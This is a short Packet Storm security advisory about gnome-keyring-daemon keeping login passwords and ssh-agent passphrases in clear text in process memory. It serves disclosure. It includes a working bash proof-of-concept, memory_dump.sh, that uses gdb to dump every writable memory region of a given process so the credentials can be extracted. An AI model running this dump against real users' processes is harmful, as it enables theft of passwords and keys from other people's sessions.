Gnome Keyring Daemon Credential Disclosure

2017-04-24T00:00:00
ID PACKETSTORM:142274
Type packetstorm
Reporter Luca Ercoli
Modified 2017-04-24T00:00:00

Description

                                        
                                            `gnome-keyring-daemon is vulnerable to local credentials disclosure.  
  
  
Fortunately the attack can be spun on already compromised machines,  
but sadly, in those cases, an attacker can leaverage on  
gnome-keyring-daemon to obtain sensible data.   
  
The application store  
password of logged users in clear text in the process memory, hence  
expose this information (such of login password, passphrase of  
ssh-agent, etc.) to an attacker.   
  
In this scenario, he can read those  
data instantly without cracking it or install keylogger, sniffer and  
variuos tools, but using gnome-keyring-daemon in order to obtain this  
informations, that can be extracted from memory using a debugger (such  
of "gdb").   
  
At this URL, there is a script (named "memory_dump.sh")  
that can be used as PoC:   
  
http://www.lucaercoli.it/   
  
memory_dump.sh:  
  
#!/bin/bash  
  
mkdir $1  
cd $1  
grep rw-p /proc/$1/maps \  
| awk '{print $1}' \  
| sed 's/-/ /' \  
| while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done  
`